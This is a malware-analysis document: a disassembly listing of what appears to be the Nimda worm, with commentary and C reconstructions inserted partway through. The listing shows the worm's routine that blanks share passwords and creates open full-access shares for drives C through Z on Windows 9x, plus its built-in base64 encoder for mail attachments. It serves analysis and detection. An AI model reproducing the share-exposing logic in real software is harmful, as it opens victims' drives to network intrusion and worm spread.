36174F1E var_35B = byte ptr -35Bh
36174F1E var_260 = byte ptr -260h
36174F1E var_15C = byte ptr -15Ch
36174F1E var_15B = byte ptr -15Bh
36174F1E var_5C = byte ptr -5Ch
36174F1E var_23 = byte ptr -23h
36174F1E var_20 = dword ptr -20h
36174F1E var_1C = dword ptr -1Ch
36174F1E var_18 = dword ptr -18h
36174F1E var_11 = byte ptr -11h
36174F1E var_10 = dword ptr -10h
36174F1E var_C = dword ptr -0Ch
36174F1E var_8 = dword ptr -8
36174F1E var_4 = dword ptr -4
36174F1E push ebp
36174F1F mov ebp, esp
36174F21 sub esp, 75Ch
36174F27 push ebx
36174F28 push esi
36174F29 xor esi, esi
36174F2B push edi
36174F2C cmp dword_3617ACB0, esi
36174F32 jz loc_36175025
36174F38 lea eax, [ebp+var_10]
36174F3B mov [ebp+var_C], 0FFh
36174F42 push eax
36174F43 push 0F003Fh
36174F48 push esi
36174F49 push offset aSystemCurren_3 ; "SYSTEM\\CurrentControlSet\\Services\\lanma"...
36174F4E push 80000002h
36174F53 mov [ebp+var_4], 1FEh
36174F5A call ds:RegOpenKeyExA
36174F60 test eax, eax
36174F62 jnz loc_36175251
36174F68 lea eax, [ebp+var_4]
36174F6B mov edi, ds:RegEnumValueA
36174F71 push eax
36174F72 lea eax, [ebp+var_35C]
36174F78 push eax
36174F79 push esi
36174F7A lea eax, [ebp+var_C]
36174F7D push esi
36174F7E push eax
36174F7F lea eax, [ebp+var_15C]
36174F85 push eax
36174F86 push esi
36174F87 push [ebp+var_10]
36174F8A mov [ebp+var_8], esi
36174F8D loc_36174F8D: ; CODE XREF: sub_36174F1E+FAj
36174F8D call edi ; RegEnumValueA
36174F8F test eax, eax
36174F91 jnz loc_3617501D
36174F97 cmp [ebp+var_15B], 24h
36174F9E jz short loc_36174FE9
36174FA0 mov eax, [ebp+var_4]
36174FA3 xor ebx, ebx
36174FA5 xor edx, edx
36174FA7 lea ecx, [eax-4]
36174FAA cmp ecx, esi
36174FAC jbe short loc_36174FE9
36174FAE loc_36174FAE: ; CODE XREF: sub_36174F1E+BEj
36174FAE cmp [ebp+edx+var_35C], 50h
36174FB6 lea eax, [ebp+edx+var_35B]
36174FBD jnz short loc_36174FD9
36174FBF cmp byte ptr [eax], 61h
36174FC2 jnz short loc_36174FD9
36174FC4 cmp byte ptr [eax+1], 74h
36174FC8 jnz short loc_36174FD9
36174FCA cmp byte ptr [eax+2], 68h
36174FCE jnz short loc_36174FD9
36174FD0 cmp byte ptr [eax+3], 3Dh
36174FD4 jnz short loc_36174FD9
36174FD6 lea ebx, [eax+4]
36174FD9 loc_36174FD9: ; CODE XREF: sub_36174F1E+9Fj
36174FD9 ; sub_36174F1E+A4j ...
36174FD9 inc edx
36174FDA cmp edx, ecx
36174FDC jb short loc_36174FAE
36174FDE cmp ebx, esi
36174FE0 jz short loc_36174FE9
36174FE2 push ebx
36174FE3 call sub_36173DCF
36174FE8 pop ecx
36174FE9 loc_36174FE9: ; CODE XREF: sub_36174F1E+80j
36174FE9 ; sub_36174F1E+8Ej ...
36174FE9 lea eax, [ebp+var_4]
36174FEC inc [ebp+var_8]
36174FEF push eax
36174FF0 lea eax, [ebp+var_35C]
36174FF6 push eax
36174FF7 push esi
36174FF8 lea eax, [ebp+var_C]
36174FFB push esi
36174FFC push eax
36174FFD lea eax, [ebp+var_15C]
36175003 push eax
36175004 mov [ebp+var_C], 0FFh
3617500B push [ebp+var_8]
3617500E mov [ebp+var_4], 1FEh
36175015 push [ebp+var_10]
36175018 jmp loc_36174F8D
3617501D ; ───────────────────────────────────────────────────────────────────────────
3617501D loc_3617501D: ; CODE XREF: sub_36174F1E+73j
3617501D push [ebp+var_10]
36175020 jmp loc_3617524B
36175025 ; ───────────────────────────────────────────────────────────────────────────
36175025 loc_36175025: ; CODE XREF: sub_36174F1E+14j
36175025 lea eax, [ebp+var_20]
36175028 mov [ebp+var_20], esi
3617502B push eax
3617502C lea eax, [ebp+var_1C]
3617502F push eax
36175030 push esi
36175031 push 0F003Fh
36175036 push esi
36175037 push esi
36175038 push esi
36175039 push offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
3617503E push 80000002h
36175043 call ds:RegCreateKeyExA
36175049 test eax, eax
3617504B jnz loc_36175251
36175051 push esi
36175052 push esi
36175053 push esi
36175054 lea eax, [ebp+var_10]
36175057 push esi
36175058 mov edi, ds:RegEnumKeyExA
3617505E push eax
3617505F lea eax, [ebp+var_15C]
36175065 push eax
36175066 push esi
36175067 push [ebp+var_1C]
3617506A mov [ebp+var_10], 0FFh
36175071 mov [ebp+var_8], esi
36175074 call edi ; RegEnumKeyExA
36175076 mov ebx, ds:RegSetValueExA
3617507C test eax, eax
3617507E jnz loc_36175171
36175084 loc_36175084: ; CODE XREF: sub_36174F1E+24Dj
36175084 cmp [ebp+var_15B], 24h
3617508B jz loc_36175148
36175091 lea eax, [ebp+var_260]
36175097 push offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
3617509C push eax
3617509D call _strcpy
361750A2 lea eax, [ebp+var_15C]
361750A8 push eax
361750A9 lea eax, [ebp+var_260]
361750AF push eax
361750B0 call _strcat
361750B5 add esp, 10h
361750B8 lea eax, [ebp+var_4]
361750BB push eax
361750BC push 0F003Fh
361750C1 lea eax, [ebp+var_260]
361750C7 push esi
361750C8 push eax
361750C9 push 80000002h
361750CE call ds:RegOpenKeyExA
361750D4 test eax, eax
361750D6 jnz short loc_36175148
361750D8 lea eax, [ebp+var_18]
361750DB mov [ebp+var_18], 400h
361750E2 push eax
361750E3 lea eax, [ebp+var_75C]
361750E9 push eax
361750EA push esi
361750EB push esi
361750EC push offset aPath ; "Path"
361750F1 push [ebp+var_4]
361750F4 mov [ebp+var_C], 192h
361750FB call ds:RegQueryValueExA
36175101 lea eax, [ebp+var_C]
36175104 push 4
36175106 push eax
36175107 push 4
36175109 push esi
3617510A push offset aFlags ; "Flags"
3617510F push [ebp+var_4]
36175112 call ebx ; RegSetValueExA
36175114 push esi
36175115 push esi
36175116 push 3
36175118 push esi
36175119 push offset aParm1enc ; "Parm1enc"
3617511E push [ebp+var_4]
36175121 call ebx ; RegSetValueExA
36175123 push esi
36175124 push esi
36175125 push 3
36175127 push esi
36175128 push offset aParm2enc ; "Parm2enc"
3617512D push [ebp+var_4]
36175130 call ebx ; RegSetValueExA
36175132 lea eax, [ebp+var_75C]
36175138 push eax
36175139 call sub_36173DCF
3617513E pop ecx
3617513F push [ebp+var_4]
36175142 call ds:RegCloseKey
36175148 loc_36175148: ; CODE XREF: sub_36174F1E+16Dj
36175148 ; sub_36174F1E+1B8j
36175148 inc [ebp+var_8]
3617514B push esi
3617514C push esi
3617514D push esi
3617514E lea eax, [ebp+var_10]
36175151 push esi
36175152 push eax
36175153 lea eax, [ebp+var_15C]
36175159 push eax
3617515A mov [ebp+var_10], 0FFh
36175161 push [ebp+var_8]
36175164 push [ebp+var_1C]
36175167 call edi ; RegEnumKeyExA
36175169 test eax, eax
3617516B jz loc_36175084
36175171 loc_36175171: ; CODE XREF: sub_36174F1E+160j
36175171 mov [ebp+var_C], esi
36175174 loc_36175174: ; CODE XREF: sub_36174F1E+324j
36175174 mov al, byte ptr [ebp+var_C]
36175177 push 0Fh
36175179 pop ecx
3617517A mov esi, offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
3617517F lea edi, [ebp+var_5C]
36175182 add al, 43h
36175184 repe movsd
36175186 mov [ebp+var_11], al
36175189 mov [ebp+var_23], al
3617518C lea eax, [ebp+var_20]
3617518F xor esi, esi
36175191 push eax
36175192 lea eax, [ebp+var_4]
36175195 push eax
36175196 push esi
36175197 push 0F003Fh
3617519C push esi
3617519D push esi
3617519E lea eax, [ebp+var_5C]
361751A1 push esi
361751A2 push eax
361751A3 push 80000002h
361751A8 call ds:RegCreateKeyExA
361751AE test eax, eax
361751B0 jnz loc_3617523B
361751B6 mov eax, dword_3617A194
361751BB push 4
361751BD mov [ebp+var_18], eax
361751C0 mov al, [ebp+var_11]
361751C3 mov byte ptr [ebp+var_18], al
361751C6 pop edi
361751C7 lea eax, [ebp+var_8]
361751CA push edi
361751CB push eax
361751CC push edi
361751CD push esi
361751CE push offset aFlags ; "Flags"
361751D3 push [ebp+var_4]
361751D6 mov [ebp+var_8], 192h
361751DD call ebx ; RegSetValueExA
361751DF push esi
361751E0 push esi
361751E1 push 3
361751E3 push esi
361751E4 push offset aParm1enc ; "Parm1enc"
361751E9
push [ebp+var_4] 361751EC call ebx ; RegSetValueExA 361751EE push esi 361751EF push esi 361751F0 push 3 361751F2 push esi 361751F3 push offset aParm2enc ; "Parm2enc" 361751F8 push [ebp+var_4] 361751FB call ebx ; RegSetValueExA 361751FD lea eax, [ebp+var_18] 36175200 push edi 36175201 push eax 36175202 push 1 36175204 push esi 36175205 push offset aPath ; "Path" 3617520A push [ebp+var_4] 3617520D call ebx ; RegSetValueExA 3617520F push esi 36175210 push esi 36175211 push 1 36175213 push esi 36175214 push offset aRemark ; "Remark" 36175219 push [ebp+var_4] 3617521C call ebx ; RegSetValueExA 3617521E lea eax, [ebp+var_8] 36175221 push edi 36175222 push eax 36175223 push edi 36175224 push esi 36175225 push offset aType ; "Type" 3617522A push [ebp+var_4] 3617522D mov [ebp+var_8], esi 36175230 call ebx ; RegSetValueExA 36175232 push [ebp+var_4] 36175235 call ds:RegCloseKey 3617523B 3617523B loc_3617523B: ; CODE XREF: sub_36174F1E+292j 3617523B inc [ebp+var_C] 3617523E cmp [ebp+var_C], 18h 36175242 jb loc_36175174 36175248 push [ebp+var_1C] 3617524B 3617524B loc_3617524B: ; CODE XREF: sub_36174F1E+102j 3617524B call ds:RegCloseKey 36175251 36175251 loc_36175251: ; CODE XREF: sub_36174F1E+44j 36175251 ; sub_36174F1E+12Dj 36175251 pop edi 36175252 pop esi 36175253 pop ebx 36175254 leave 36175255 retn 36175255 sub_36174F1E endp 36175255 36175256 36175256 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175256 36175256 ; Attributes: bp-based frame 36175256 36175256 sub_36175256 proc near ; CODE XREF: sub_361767C9+F8p 36175256 36175256 var_1C = byte ptr -1Ch 36175256 var_1B = dword ptr -1Bh 36175256 var_14 = byte ptr -14h 36175256 var_10 = dword ptr -10h 36175256 var_C = dword ptr -0Ch 36175256 var_8 = dword ptr -8 36175256 var_4 = dword ptr -4 36175256 arg_0 = dword ptr 8 36175256 arg_4 = dword ptr 0Ch 36175256 36175256 push ebp 36175257 mov ebp, esp 36175259 sub esp, 1Ch 3617525C push ebx 3617525D push esi 3617525E xor ebx, ebx 36175260 push 
edi 36175261 push ebx 36175262 mov esi, ds:CreateFileA 36175268 push ebx 36175269 push 3 3617526B push ebx 3617526C push 1 3617526E push 80000000h 36175273 mov [ebp+var_C], ebx 36175276 push [ebp+arg_0] 36175279 call esi ; CreateFileA 3617527B mov edi, eax 3617527D cmp edi, 0FFFFFFFFh 36175280 jz loc_3617531C 36175286 push ebx 36175287 push edi 36175288 call ds:GetFileSize 3617528E cmp eax, 0FFFFFFFFh 36175291 mov [ebp+var_8], eax 36175294 jnz short loc_3617529F 36175296 36175296 loc_36175296: ; CODE XREF: sub_36175256+60j 36175296 push edi 36175297 call ds:CloseHandle 3617529D jmp short loc_3617531C 3617529F ; ─────────────────────────────────────────────────────────────────────────── 3617529F 3617529F loc_3617529F: ; CODE XREF: sub_36175256+3Ej 3617529F add eax, 10h 361752A2 push eax 361752A3 push 8 361752A5 push dword_3617ACB4 361752AB call dword_3617AC74 361752B1 cmp eax, ebx 361752B3 mov [ebp+var_4], eax 361752B6 jz short loc_36175296 361752B8 lea ecx, [ebp+var_C] 361752BB push ebx 361752BC push ecx 361752BD push [ebp+var_8] 361752C0 push eax 361752C1 push edi 361752C2 call ds:ReadFile 361752C8 test eax, eax 361752CA push edi 361752CB jnz short loc_361752D5 361752CD call ds:CloseHandle 361752D3 jmp short loc_3617530C 361752D5 ; ─────────────────────────────────────────────────────────────────────────── 361752D5 361752D5 loc_361752D5: ; CODE XREF: sub_36175256+75j 361752D5 call ds:CloseHandle 361752DB mov eax, [ebp+var_8] 361752DE push 3 361752E0 xor edx, edx 361752E2 pop ecx 361752E3 div ecx 361752E5 cmp edx, ebx 361752E7 mov [ebp+arg_0], edx 361752EA jz short loc_361752F3 361752EC push ecx 361752ED pop eax 361752EE sub eax, edx 361752F0 mov [ebp+arg_0], eax 361752F3 361752F3 loc_361752F3: ; CODE XREF: sub_36175256+94j 361752F3 push ebx 361752F4 push ebx 361752F5 push 4 361752F7 push ebx 361752F8 push 1 361752FA push 40000000h 361752FF push [ebp+arg_4] 36175302 call esi ; CreateFileA 36175304 cmp eax, 0FFFFFFFFh 36175307 mov [ebp+arg_4], eax 3617530A jnz short 
loc_36175323 3617530C 3617530C loc_3617530C: ; CODE XREF: sub_36175256+7Dj 3617530C push [ebp+var_4] 3617530F push ebx 36175310 push dword_3617ACB4 36175316 call dword_3617AC70 3617531C 3617531C loc_3617531C: ; CODE XREF: sub_36175256+2Aj 3617531C ; sub_36175256+47j 3617531C xor eax, eax 3617531E jmp loc_36175456 36175323 ; ─────────────────────────────────────────────────────────────────────────── 36175323 36175323 loc_36175323: ; CODE XREF: sub_36175256+B4j 36175323 push 2 36175325 push ebx 36175326 push ebx 36175327 push eax 36175328 call ds:SetFilePointer 3617532E mov eax, [ebp+var_8] 36175331 xor edi, edi 36175333 xor ecx, ecx 36175335 cmp [ebp+arg_0], ebx 36175338 push 3 3617533A setnz cl 3617533D xor edx, edx 3617533F pop esi 36175340 div esi 36175342 add eax, ecx 36175344 cmp eax, ebx 36175346 mov [ebp+var_8], eax 36175349 jbe loc_3617543A 3617534F mov esi, [ebp+var_4] 36175352 jmp short loc_36175357 36175354 ; ─────────────────────────────────────────────────────────────────────────── 36175354 36175354 loc_36175354: ; CODE XREF: sub_36175256+1DEj 36175354 mov eax, [ebp+var_8] 36175357 36175357 loc_36175357: ; CODE XREF: sub_36175256+FCj 36175357 dec eax 36175358 cmp edi, eax 3617535A mov [ebp+var_10], eax 3617535D jnz short loc_36175374 3617535F cmp [ebp+arg_0], ebx 36175362 jz short loc_36175374 36175364 cmp [ebp+arg_0], 1 36175368 jnz short loc_3617536E 3617536A xor dl, dl 3617536C jmp short loc_36175377 3617536E ; ─────────────────────────────────────────────────────────────────────────── 3617536E 3617536E loc_3617536E: ; CODE XREF: sub_36175256+112j 3617536E xor dl, dl 36175370 xor cl, cl 36175372 jmp short loc_3617537A 36175374 ; ─────────────────────────────────────────────────────────────────────────── 36175374 36175374 loc_36175374: ; CODE XREF: sub_36175256+107j 36175374 ; sub_36175256+10Cj 36175374 mov dl, [esi+2] 36175377 36175377 loc_36175377: ; CODE XREF: sub_36175256+116j 36175377 mov cl, [esi+1] 3617537A 3617537A loc_3617537A: ; CODE XREF: 
sub_36175256+11Cj 3617537A mov bl, dl 3617537C mov al, [esi] 3617537E and bl, 3Fh 36175381 mov byte ptr [ebp+var_1B+2], bl 36175384 mov bl, cl 36175386 and bl, 0Fh 36175389 shl bl, 2 3617538C shr dl, 6 3617538F or bl, dl 36175391 mov dl, al 36175393 and dl, 3 36175396 mov byte ptr [ebp+var_1B+1], bl 36175399 shl dl, 4 3617539C shr cl, 4 3617539F or dl, cl 361753A1 shr al, 2 361753A4 mov byte ptr [ebp+var_1B], dl 361753A7 mov [ebp+var_1C], al 361753AA push dword ptr [ebp+var_1C] 361753AD call sub_3617545B 361753B2 push [ebp+var_1B] 361753B5 mov [ebp+var_1C], al 361753B8 call sub_3617545B 361753BD push [ebp+var_1B+1] 361753C0 mov byte ptr [ebp+var_1B], al 361753C3 call sub_3617545B 361753C8 push [ebp+var_1B+2] 361753CB mov byte ptr [ebp+var_1B+1], al 361753CE call sub_3617545B 361753D3 add esp, 10h 361753D6 cmp edi, [ebp+var_10] 361753D9 mov byte ptr [ebp+var_1B+2], al 361753DC jnz short loc_361753F5 361753DE xor ebx, ebx 361753E0 cmp [ebp+arg_0], ebx 361753E3 jz short loc_361753F7 361753E5 cmp [ebp+arg_0], 1 361753E9 jz short loc_361753EF 361753EB mov byte ptr [ebp+var_1B+1], 3Dh 361753EF 361753EF loc_361753EF: ; CODE XREF: sub_36175256+193j 361753EF mov byte ptr [ebp+var_1B+2], 3Dh 361753F3 jmp short loc_361753F7 361753F5 ; ─────────────────────────────────────────────────────────────────────────── 361753F5 361753F5 loc_361753F5: ; CODE XREF: sub_36175256+186j 361753F5 xor ebx, ebx 361753F7 361753F7 loc_361753F7: ; CODE XREF: sub_36175256+18Dj 361753F7 ; sub_36175256+19Dj 361753F7 lea eax, [ebp+var_14] 361753FA push ebx 361753FB push eax 361753FC lea eax, [ebp+var_1C] 361753FF push 4 36175401 push eax 36175402 push [ebp+arg_4] 36175405 call ds:WriteFile 3617540B inc edi 3617540C push 13h 3617540E mov eax, edi 36175410 xor edx, edx 36175412 pop ecx 36175413 div ecx 36175415 test edx, edx 36175417 jnz short loc_3617542E 36175419 lea eax, [ebp+var_14] 3617541C push ebx 3617541D push eax 3617541E push 2 36175420 push offset asc_3617A2AC ; "\r\n" 36175425 push 
[ebp+arg_4] 36175428 call ds:WriteFile 3617542E 3617542E loc_3617542E: ; CODE XREF: sub_36175256+1C1j 3617542E add esi, 3 36175431 cmp edi, [ebp+var_8] 36175434 jb loc_36175354 3617543A 3617543A loc_3617543A: ; CODE XREF: sub_36175256+F3j 3617543A push [ebp+var_4] 3617543D push ebx 3617543E push dword_3617ACB4 36175444 call dword_3617AC70 3617544A push [ebp+arg_4] 3617544D call ds:CloseHandle 36175453 push 1 36175455 pop eax 36175456 36175456 loc_36175456: ; CODE XREF: sub_36175256+C8j 36175456 pop edi 36175457 pop esi 36175458 pop ebx 36175459 leave 3617545A retn 3617545A sub_36175256 endp 3617545A 3617545B 3617545B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617545B 3617545B 3617545B sub_3617545B proc near ; CODE XREF: sub_36175256+157p 3617545B ; sub_36175256+162p ... 3617545B 3617545B arg_0 = byte ptr 4 3617545B 3617545B mov al, [esp+arg_0] 3617545F cmp al, 19h 36175461 ja short loc_36175466 36175463 add al, 41h 36175465 retn 36175466 ; ─────────────────────────────────────────────────────────────────────────── 36175466 36175466 loc_36175466: ; CODE XREF: sub_3617545B+6j 36175466 cmp al, 1Ah 36175468 jb short loc_36175471 3617546A cmp al, 33h 3617546C ja short loc_36175471 3617546E add al, 47h 36175470 retn 36175471 ; ─────────────────────────────────────────────────────────────────────────── 36175471 36175471 loc_36175471: ; CODE XREF: sub_3617545B+Dj 36175471 ; sub_3617545B+11j 36175471 cmp al, 34h 36175473 jb short loc_3617547C 36175475 cmp al, 3Dh 36175477 ja short loc_3617547C 36175479 add al, 0FCh 3617547B retn 3617547C ; ─────────────────────────────────────────────────────────────────────────── 3617547C 3617547C loc_3617547C: ; CODE XREF: sub_3617545B+18j 3617547C ; sub_3617545B+1Cj 3617547C cmp al, 3Eh 3617547E jnz short loc_36175483 36175480 add al, 0EDh 36175482 retn 36175483 ; ─────────────────────────────────────────────────────────────────────────── 36175483 36175483 loc_36175483: ; CODE XREF: sub_3617545B+23j 
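Stepping back to sub_36174F1E, the share routine that ends right before sub_36175256: with dword_3617ACB0 non-zero it takes the NT path and enumerates the values of the "SYSTEM\\CurrentControlSet\\Services\\lanma"... key (name truncated in the listing), skips every value whose second character is '$' (cmp [ebp+var_15B], 24h), searches the value data for "Path=" with the byte-compare loop at loc_36174FAE and hands the text after it to sub_36173DCF. Otherwise it takes the Windows 9x path: for every existing subkey of the "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"... key it rewrites Flags to 192h and sets Parm1enc and Parm2enc, the share password fields, to zero-length REG_BINARY values, reads Path and passes it to sub_36173DCF; then the loop at loc_36175174 runs var_C from 0 to 17h, adds 43h to get 'C'..'Z', writes that letter into a 60-byte key-name template at offset 57 (var_23) and over the first byte of a 4-byte Path value (var_11), and creates a share with Flags=192h, Type=0, empty Remark and empty password blobs. The C below is an added reconstruction written for this edit, not code from the worm or from the original analysis. It assumes the template ends in "X$" and the Path value is "X:\" (both fit the 60-byte and 4-byte sizes but the strings are cut off in the listing), reads 192h as the 9x full-access flag value, and the REG_MULTI_SZ sample for the NT branch is constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* One share record as the Windows 9x branch of sub_36174F1E writes it.
 * Value names, types and sizes come from the RegSetValueExA calls in the
 * listing; the "X$" name and "X:\" path are ASSUMED (template text is
 * truncated on the page, only the letter offsets and lengths are visible). */
struct lanman_share {
    char name[4];              /* letter at var_23 -> "X$" (assumed suffix) */
    char path[4];              /* letter at var_11 over dword_3617A194 -> "X:\" (assumed) */
    unsigned long flags;       /* "Flags" = 0x192, REG_DWORD, 4 bytes */
    unsigned long type;        /* "Type"  = 0,     REG_DWORD, 4 bytes */
    size_t parm1enc_len;       /* "Parm1enc", REG_BINARY, cbData 0 */
    size_t parm2enc_len;       /* "Parm2enc", REG_BINARY, cbData 0 */
};

static struct lanman_share worm_shares[0x18];

/* loc_36175174: var_C counts 0..0x17 and al = var_C + 0x43, i.e. 'C'..'Z'. */
static size_t build_worm_shares(void)
{
    for (unsigned i = 0; i < 0x18; i++) {
        struct lanman_share *s = &worm_shares[i];
        char letter = (char)(i + 0x43);
        s->name[0] = letter; s->name[1] = '$';  s->name[2] = '\0';
        s->path[0] = letter; s->path[1] = ':';  s->path[2] = '\\'; s->path[3] = '\0';
        s->flags = 0x192;
        s->type = 0;
        s->parm1enc_len = s->parm2enc_len = 0;
    }
    return 0x18;
}

static const char *worm_share_name(size_t i) { return worm_shares[i].name; }
static const char *worm_share_path(size_t i) { return worm_shares[i].path; }

/* Detection heuristic for a 9x share record: drive-root path, the worm's
 * flag value, both password blobs empty (it also blanks them on shares that
 * already existed, see the RegSetValueExA calls after loc_36175084). */
static int looks_like_worm_share(const struct lanman_share *s)
{
    return s->flags == 0x192
        && s->parm1enc_len == 0 && s->parm2enc_len == 0
        && strlen(s->path) == 3 && s->path[1] == ':' && s->path[2] == '\\';
}

/* Both enumeration loops skip names whose SECOND byte is '$'
 * (cmp [ebp+var_15B], 24h): C$..Z$ are skipped, ADMIN$ and IPC$ are not. */
static int skipped_by_worm(const char *name)
{
    return name[0] != '\0' && name[1] == '$';
}

/* NT branch, loc_36174FAE: scan cb bytes of a lanmanserver\Shares
 * REG_MULTI_SZ value for "Path=" and return the text after it. The loop
 * keeps overwriting ebx, so the last match wins. NULL when absent. */
static const char *find_share_path(const char *data, size_t cb)
{
    const char *hit = NULL;
    for (size_t i = 0; i + 5 <= cb; i++)
        if (memcmp(data + i, "Path=", 5) == 0)
            hit = data + i + 5;
    return hit;
}

/* Constructed sample of one share's REG_MULTI_SZ data (not from the page). */
static const char sample_share_blob[] =
    "CSCFlags=0\0MaxUses=4294967295\0Path=C:\\Inetpub\\wwwroot\0"
    "Permissions=0\0Remark=\0Type=0\0";

static const char *sample_share_path(void)
{
    return find_share_path(sample_share_blob, sizeof sample_share_blob);
}

int main(void)
{
    size_t n = build_worm_shares();
    for (size_t i = 0; i < n; i++)
        printf("%s -> %s flags=0x%lx worm=%d\n", worm_share_name(i), worm_share_path(i),
               worm_shares[i].flags, looks_like_worm_share(&worm_shares[i]));
    printf("NT share path: %s\n", sample_share_path());
    return 0;
}
```

On a 9x box the records this produces are what to look for after an infection: 24 shares named after every drive letter, all with the same flag value and no password. On NT the routine does not create shares; it reuses whatever lanmanserver already exports, so the check there is which share paths the worm was able to reach.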
36175483 cmp al, 3Fh 36175485 setnz al 36175488 dec eax 36175489 and eax, 2Fh 3617548C retn 3617548C sub_3617545B endp 3617548C 3617548D 3617548D ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617548D 3617548D ; Attributes: bp-based frame 3617548D 3617548D sub_3617548D proc near ; CODE XREF: sub_36171F05+136p 3617548D 3617548D var_28 = word ptr -28h 3617548D var_26 = word ptr -26h 3617548D var_22 = word ptr -22h 3617548D var_18 = dword ptr -18h 3617548D var_14 = dword ptr -14h 3617548D var_10 = dword ptr -10h 3617548D var_C = dword ptr -0Ch 3617548D var_8 = dword ptr -8 3617548D var_4 = dword ptr -4 3617548D 3617548D push ebp 3617548E mov ebp, esp 36175490 sub esp, 28h 36175493 push ebx 36175494 lea eax, [ebp+var_28] 36175497 push edi 36175498 xor ebx, ebx 3617549A push eax 3617549B mov [ebp+var_10], ebx 3617549E call ds:GetSystemTime 361754A4 movzx eax, [ebp+var_28] 361754A8 movzx ecx, [ebp+var_26] 361754AC imul eax, 16Dh 361754B2 imul ecx, 1Eh 361754B5 add eax, ecx 361754B7 push 4 361754B9 movzx ecx, [ebp+var_22] 361754BD add eax, ecx 361754BF pop edi 361754C0 mov [ebp+var_C], eax 361754C3 lea eax, [ebp+var_14] 361754C6 push eax 361754C7 lea eax, [ebp+var_4] 361754CA push eax 361754CB push ebx 361754CC push 0F003Fh 361754D1 push ebx 361754D2 push ebx 361754D3 push ebx 361754D4 push offset aSoftwareMicr_8 ; "Software\\Microsoft\\Windows\\CurrentVersi"... 
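sub_36175256 and sub_3617545B above are a base64 encoder. The file named by arg_0 is read whole into a heap buffer, every 3 input bytes become 4 output characters written to the file named by arg_4, the remainder is padded with '=' (the routine reuses its arg_0 slot to hold the pad count, 3 minus the remainder of the size divided by 3), and "\r\n" is written after every 19 groups, which is 76 characters per line, the MIME line length. sub_3617545B maps a 6-bit value to its digit by arithmetic rather than a table: +41h, +47h, +0FCh, +0EDh and the setnz/dec/and trick for '/'. The C below is an added reconstruction written for this edit, not code from the worm or from the original article; it keeps the same bit packing, padding and line breaking but works on an in-memory buffer instead of files, and the sample input is constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* sub_3617545B: 6-bit value -> base64 digit, computed with adds instead of
 * a 64-byte table. Each branch mirrors one compare/add path of the routine. */
static unsigned char nimda_b64_digit(unsigned char v)
{
    if (v <= 0x19) return (unsigned char)(v + 0x41);    /* 0..25  -> 'A'..'Z' */
    if (v <= 0x33) return (unsigned char)(v + 0x47);    /* 26..51 -> 'a'..'z' */
    if (v <= 0x3D) return (unsigned char)(v + 0xFC);    /* 52..61 -> '0'..'9', wraps */
    if (v == 0x3E) return (unsigned char)(v + 0xED);    /* 62     -> '+', wraps */
    if (v == 0x3F) return (unsigned char)(0xFF & 0x2F); /* 63: setnz al=0, dec, and 2Fh -> '/' */
    return 0;                                           /* anything else -> NUL */
}

/* sub_36175256 minus the file I/O: 3 bytes -> 4 digits, '=' padding (the
 * routine keeps the pad count in its arg_0 slot) and "\r\n" after every 19
 * groups, i.e. 76 characters per line. `out` needs
 * 4*ceil(n/3) + 2*floor(ceil(n/3)/19) + 1 bytes. Returns chars written. */
static size_t nimda_b64_encode(const unsigned char *in, size_t n, char *out)
{
    size_t groups = n / 3 + (n % 3 != 0);
    size_t pad = (n % 3 == 0) ? 0 : 3 - n % 3;
    size_t o = 0;
    for (size_t g = 0; g < groups; g++) {
        const unsigned char *p = in + 3 * g;
        int last = (g + 1 == groups);
        unsigned char a = p[0];
        unsigned char b = (last && pad == 2) ? 0 : p[1];   /* loc_3617536E: cl = 0 */
        unsigned char c = (last && pad != 0) ? 0 : p[2];   /* dl = 0 on any padding */
        out[o++] = (char)nimda_b64_digit((unsigned char)(a >> 2));
        out[o++] = (char)nimda_b64_digit((unsigned char)(((a & 3) << 4) | (b >> 4)));
        out[o++] = (char)nimda_b64_digit((unsigned char)(((b & 0x0F) << 2) | (c >> 6)));
        out[o++] = (char)nimda_b64_digit((unsigned char)(c & 0x3F));
        if (last && pad >= 1) out[o - 1] = '=';
        if (last && pad == 2) out[o - 2] = '=';
        if ((g + 1) % 19 == 0) { out[o++] = '\r'; out[o++] = '\n'; }  /* inc edi; edi mod 13h */
    }
    out[o] = '\0';
    return o;
}

static char out_buf[512];

/* Encode a NUL-terminated sample and compare with the expected text. */
static int encodes_to(const char *sample, const char *expected)
{
    nimda_b64_encode((const unsigned char *)sample, strlen(sample), out_buf);
    return strcmp(out_buf, expected) == 0;
}

/* 57 input bytes are exactly 19 groups, so the worm emits one CRLF after
 * the 76th character. Returns the total length (78) if it did, else 0. */
static size_t line_length_after_57_bytes(void)
{
    unsigned char fill[57];
    memset(fill, 'A', sizeof fill);
    size_t n = nimda_b64_encode(fill, sizeof fill, out_buf);
    return (n == 78 && out_buf[76] == '\r' && out_buf[77] == '\n') ? n : 0;
}

int main(void)
{
    const char *sample = "constructed sample input for the encoder";   /* not from the worm */
    nimda_b64_encode((const unsigned char *)sample, strlen(sample), out_buf);
    printf("%s\n", out_buf);
    return 0;
}
```

The output is standard base64, so nothing here is a signature on its own; what matters for the analysis is that the worm carries its own MIME encoder and never calls a system library for it, which is why the strings section shows no CryptBinaryToString-style import and why the attachment in the generated mail is a plain base64 body with 76-character lines.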
